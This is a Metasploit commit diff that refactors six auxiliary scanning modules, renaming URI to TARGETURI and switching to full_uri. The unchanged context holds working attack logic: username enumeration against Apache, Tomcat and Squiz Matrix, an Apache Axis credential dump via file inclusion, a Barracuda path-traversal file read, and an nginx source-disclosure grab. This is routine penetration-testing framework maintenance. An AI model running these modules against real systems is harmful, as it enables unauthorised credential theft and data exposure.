Land #6281, TARGETURI/full_uri fixes
commit
e56aa96a66
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, 'The path to users Home Page', '/']),
|
||||
OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),
|
||||
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
|
||||
File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ]),
|
||||
], self.class)
|
||||
|
@ -51,11 +51,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
@users_found = {}
|
||||
|
||||
|
@ -64,9 +59,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}
|
||||
|
||||
if(@users_found.empty?)
|
||||
print_status("#{target_url} - No users found.")
|
||||
print_status("#{full_uri} - No users found.")
|
||||
else
|
||||
print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
|
||||
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
|
||||
report_note(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
|
@ -80,8 +75,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def do_login(user)
|
||||
|
||||
vprint_status("#{target_url}~#{user} - Trying UserDir: '#{user}'")
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")
|
||||
uri = normalize_uri(target_uri.path)
|
||||
payload = "#{uri}~#{user}/"
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
|
@ -93,10 +88,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
return unless res
|
||||
if ((res.code == 403) or (res.code == 200))
|
||||
print_good("#{target_url} - Apache UserDir: '#{user}' found ")
|
||||
print_good("#{full_uri} - Apache UserDir: '#{user}' found ")
|
||||
@users_found[user] = :reported
|
||||
else
|
||||
vprint_status("#{target_url} - Apache UserDir: '#{user}' not found ")
|
||||
vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")
|
||||
end
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
|
|
|
@ -34,17 +34,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options([
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('URI', [false, 'The path to the Axis listServices', '/axis2/services/listServices']),
|
||||
OptString.new('TARGETURI', [false, 'The path to the Axis listServices', '/axis2/services/listServices']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri = normalize_uri(target_uri.path)
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
|
@ -53,13 +48,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}, 25)
|
||||
|
||||
if (res and res.code == 200)
|
||||
extract_uri = res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)
|
||||
new_uri = "/axis2/services/#{$1}"
|
||||
new_uri = normalize_uri(new_uri)
|
||||
res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)
|
||||
new_uri = normalize_uri("/axis2/services/#{$1}")
|
||||
get_credentials(new_uri)
|
||||
|
||||
else
|
||||
print_status("#{target_url} - Apache Axis - The remote page not accessible")
|
||||
print_status("#{full_uri} - Apache Axis - The remote page not accessible")
|
||||
return
|
||||
|
||||
end
|
||||
|
@ -106,10 +100,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'uri' => "#{uri}" + lfi_payload,
|
||||
}, 25)
|
||||
|
||||
print_status("#{target_url} - Apache Axis - Dumping administrative credentials")
|
||||
print_status("#{full_uri} - Apache Axis - Dumping administrative credentials")
|
||||
|
||||
if res.nil?
|
||||
print_error("#{target_url} - Connection timed out")
|
||||
print_error("#{full_uri} - Connection timed out")
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -121,17 +115,17 @@ class Metasploit3 < Msf::Auxiliary
|
|||
res.body.scan(/parameter\sname=\"password\">([^\s]+)</)
|
||||
password = $1
|
||||
|
||||
print_good("#{target_url} - Apache Axis - Credentials Found Username: '#{username}' - Password: '#{password}'")
|
||||
print_good("#{full_uri} - Apache Axis - Credentials Found Username: '#{username}' - Password: '#{password}'")
|
||||
|
||||
report_cred(ip: rhost, port: rport, user: username, password: password, proof: res.body)
|
||||
|
||||
else
|
||||
print_error("#{target_url} - Apache Axis - Not Vulnerable")
|
||||
print_error("#{full_uri} - Apache Axis - Not Vulnerable")
|
||||
return :abort
|
||||
end
|
||||
|
||||
else
|
||||
print_error("#{target_url} - Apache Axis - Unrecognized #{res.code} response")
|
||||
print_error("#{full_uri} - Apache Axis - Unrecognized #{res.code} response")
|
||||
return :abort
|
||||
|
||||
end
|
||||
|
|
|
@ -38,21 +38,16 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(8000),
|
||||
OptString.new('FILE', [ true, "Define the remote file to view, ex:/etc/passwd", '/mail/snapshot/config.snapshot']),
|
||||
OptString.new('URI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),
|
||||
OptString.new('TARGETURI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri = normalize_uri(target_uri.path)
|
||||
file = datastore['FILE']
|
||||
payload = "?locale=/../../../../../../..#{file}%00"
|
||||
|
||||
print_status("#{target_url} - Barracuda - Checking if remote server is vulnerable")
|
||||
print_status("#{full_uri} - Barracuda - Checking if remote server is vulnerable")
|
||||
|
||||
res = send_request_raw(
|
||||
{
|
||||
|
@ -61,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}, 25)
|
||||
|
||||
if res.nil?
|
||||
print_error("#{target_url} - Connection timed out")
|
||||
print_error("#{full_uri} - Connection timed out")
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -73,21 +68,21 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if html.length > 100
|
||||
file_data = html.gsub(%r{</?[^>]+?>}, '')
|
||||
|
||||
print_good("#{target_url} - Barracuda - Vulnerable")
|
||||
print_good("#{target_url} - Barracuda - File Output:\n" + file_data + "\n")
|
||||
print_good("#{full_uri} - Barracuda - Vulnerable")
|
||||
print_good("#{full_uri} - Barracuda - File Output:\n" + file_data + "\n")
|
||||
else
|
||||
print_error("#{target_url} - Barracuda - Not vulnerable: HTML too short?")
|
||||
print_error("#{full_uri} - Barracuda - Not vulnerable: HTML too short?")
|
||||
end
|
||||
elsif res.body =~ /help_page/
|
||||
print_error("#{target_url} - Barracuda - Not vulnerable: Patched?")
|
||||
print_error("#{full_uri} - Barracuda - Not vulnerable: Patched?")
|
||||
else
|
||||
print_error("#{target_url} - Barracuda - File not found or permission denied")
|
||||
print_error("#{full_uri} - Barracuda - File not found or permission denied")
|
||||
end
|
||||
else
|
||||
print_error("#{target_url} - Barracuda - No HTML was returned")
|
||||
print_error("#{full_uri} - Barracuda - No HTML was returned")
|
||||
end
|
||||
else
|
||||
print_error("#{target_url} - Barracuda - Unrecognized #{res.code} response")
|
||||
print_error("#{full_uri} - Barracuda - Unrecognized #{res.code} response")
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
|
|
|
@ -35,18 +35,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']),
|
||||
OptString.new('TARGETURI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']),
|
||||
OptString.new('PATH_SAVE', [true, 'The path to save the downloaded source code', '']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri = normalize_uri(target_uri.path)
|
||||
path_save = datastore['PATH_SAVE']
|
||||
|
||||
vuln_versions = [
|
||||
|
@ -70,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}, 25)
|
||||
|
||||
if res.nil?
|
||||
print_error("#{target_url} - nginx - Connection timed out")
|
||||
print_error("#{full_uri} - nginx - Connection timed out")
|
||||
return
|
||||
else
|
||||
version = res.headers['Server']
|
||||
|
@ -78,17 +73,17 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
if vuln_versions.include?(version)
|
||||
print_good("#{target_url} - nginx - Vulnerable version: #{version}")
|
||||
print_good("#{full_uri} - nginx - Vulnerable version: #{version}")
|
||||
|
||||
if (res and res.code == 200)
|
||||
|
||||
print_good("#{target_url} - nginx - Getting the source of page #{uri}")
|
||||
print_good("#{full_uri} - nginx - Getting the source of page #{uri}")
|
||||
|
||||
save_source = File.new("#{path_save}#{uri}","w")
|
||||
save_source.puts(res.body.to_s)
|
||||
save_source.close
|
||||
|
||||
print_status("#{target_url} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}"))
|
||||
print_status("#{full_uri} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}"))
|
||||
|
||||
else
|
||||
print_error("http://#{vhost}:#{rport} - nginx - Unrecognized #{res.code} response")
|
||||
|
@ -98,9 +93,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
else
|
||||
if version =~ /nginx/
|
||||
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}")
|
||||
print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}")
|
||||
else
|
||||
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not ngnix")
|
||||
print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not ngnix")
|
||||
end
|
||||
return
|
||||
|
||||
|
|
|
@ -40,17 +40,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, 'The path to users Squiz Matrix installation', '/']),
|
||||
OptString.new('TARGETURI', [true, 'The path to users Squiz Matrix installation', '/']),
|
||||
OptInt.new('ASSETBEGIN', [ true, "Asset ID to start at", 1]),
|
||||
OptInt.new('ASSETEND', [ true, "Asset ID to stop at", 100]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
@users_found = {}
|
||||
|
||||
|
@ -65,9 +60,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
if(@users_found.empty?)
|
||||
print_status("#{target_url} - No users found.")
|
||||
print_status("#{full_uri} - No users found.")
|
||||
else
|
||||
print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
|
||||
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
|
||||
report_note(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
|
@ -106,16 +101,18 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def do_enum(asset)
|
||||
begin
|
||||
uri = normalize_uri(target_uri.path)
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{target_url}?a=#{asset}",
|
||||
'uri' => "#{uri}?a=#{asset}",
|
||||
'method' => 'GET'
|
||||
}, 20)
|
||||
|
||||
if (datastore['VERBOSE'])
|
||||
if (res and res.code = 403 and res.body and res.body =~ /You do not have permission to access <i>(\w+)<\/i>/)
|
||||
print_status("#{target_url}?a=#{asset} - Trying Asset: '#{asset}' title '#{$1}'")
|
||||
print_status("#{full_uri}?a=#{asset} - Trying Asset: '#{asset}' title '#{$1}'")
|
||||
else
|
||||
print_status("#{target_url}?a=#{asset} - Trying Asset: '#{asset}'")
|
||||
print_status("#{full_uri}?a=#{asset} - Trying Asset: '#{asset}'")
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -123,25 +120,25 @@ class Metasploit3 < Msf::Auxiliary
|
|||
user=$1.strip
|
||||
|
||||
# try the full name of the user
|
||||
tmpasset = asset -1
|
||||
tmpasset = asset - 1
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{target_url}?a=#{tmpasset}",
|
||||
'uri' => "#{uri}?a=#{tmpasset}",
|
||||
'method' => 'GET'
|
||||
}, 20)
|
||||
if (res and res.code = 403 and res.body and res.body =~ /You do not have permission to access <i>Inbox<\/i>/)
|
||||
tmpasset = asset -2
|
||||
tmpasset = asset - 2
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{target_url}?a=#{tmpasset}",
|
||||
'uri' => "#{uri}?a=#{tmpasset}",
|
||||
'method' => 'GET'
|
||||
}, 20)
|
||||
print_good("#{target_url}?a=#{asset} - Trying to obtain fullname for Asset ID '#{asset}', '#{user}'")
|
||||
print_good("#{full_uri}?a=#{asset} - Trying to obtain fullname for Asset ID '#{asset}', '#{user}'")
|
||||
if (res and res.code = 403 and res.body and res.body =~ /You do not have permission to access <i>(.*)<\/i>/)
|
||||
fullname = $1.strip
|
||||
print_good("#{target_url}?a=#{tmpasset} - Squiz Matrix User Found: '#{user}' (#{fullname})")
|
||||
print_good("#{full_uri}?a=#{tmpasset} - Squiz Matrix User Found: '#{user}' (#{fullname})")
|
||||
@users_found["#{user} (#{fullname})"] = :reported
|
||||
end
|
||||
else
|
||||
print_good("#{target_url} - Squiz Matrix User: '#{user}'")
|
||||
print_good("#{full_uri} - Squiz Matrix User: '#{user}'")
|
||||
@users_found[user] = :reported
|
||||
end
|
||||
|
||||
|
|
|
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('URI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
|
||||
OptString.new('TARGETURI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
|
||||
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
|
||||
File.join(Msf::Config.data_directory, "wordlists", "tomcat_mgr_default_users.txt") ]),
|
||||
], self.class)
|
||||
|
@ -49,16 +49,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME')
|
||||
end
|
||||
|
||||
def target_url
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def has_j_security_check?
|
||||
vprint_status("#{target_url} - Checking j_security_check...")
|
||||
res = send_request_raw({'uri' => normalize_uri(datastore['URI'])})
|
||||
vprint_status("#{full_uri} - Checking j_security_check...")
|
||||
res = send_request_raw({'uri' => normalize_uri(target_uri.path)})
|
||||
if res
|
||||
vprint_status("#{target_url} - Server returned: #{res.code.to_s}")
|
||||
vprint_status("#{full_uri} - Server returned: #{res.code.to_s}")
|
||||
return true if res.code == 200 or res.code == 302
|
||||
end
|
||||
|
||||
|
@ -67,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
unless has_j_security_check?
|
||||
print_error("#{target_url} - Unable to enumerate users with this URI")
|
||||
print_error("#{full_uri} - Unable to enumerate users with this URI")
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -78,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}
|
||||
|
||||
if(@users_found.empty?)
|
||||
print_status("#{target_url} - No users found.")
|
||||
print_status("#{full_uri} - No users found.")
|
||||
else
|
||||
print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
|
||||
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
|
||||
report_note(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
|
@ -92,34 +87,34 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def do_login(user)
|
||||
post_data = "j_username=#{user}&password=%"
|
||||
vprint_status("#{target_url} - Apache Tomcat - Trying name: '#{user}'")
|
||||
vprint_status("#{full_uri} - Apache Tomcat - Trying name: '#{user}'")
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'data' => post_data,
|
||||
}, 20)
|
||||
|
||||
if res and res.code == 200 and !res.get_cookies.empty?
|
||||
vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
|
||||
vprint_error("#{full_uri} - Apache Tomcat #{user} not found ")
|
||||
elsif res and res.code == 200 and res.body =~ /invalid username/i
|
||||
vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
|
||||
vprint_error("#{full_uri} - Apache Tomcat #{user} not found ")
|
||||
elsif res and res.code == 500
|
||||
# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
|
||||
vprint_good("#{target_url} - Apache Tomcat #{user} found ")
|
||||
vprint_good("#{full_uri} - Apache Tomcat #{user} found ")
|
||||
@users_found[user] = :reported
|
||||
elsif res and res.body.empty? and res.headers['Location'] !~ /error\.jsp$/
|
||||
# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
|
||||
print_good("#{target_url} - Apache Tomcat #{user} found ")
|
||||
print_good("#{full_uri} - Apache Tomcat #{user} found ")
|
||||
@users_found[user] = :reported
|
||||
else
|
||||
print_error("#{target_url} - NOT VULNERABLE")
|
||||
print_error("#{full_uri} - NOT VULNERABLE")
|
||||
return :abort
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
|
||||
print_error("#{target_url} - UNREACHABLE")
|
||||
print_error("#{full_uri} - UNREACHABLE")
|
||||
return :abort
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue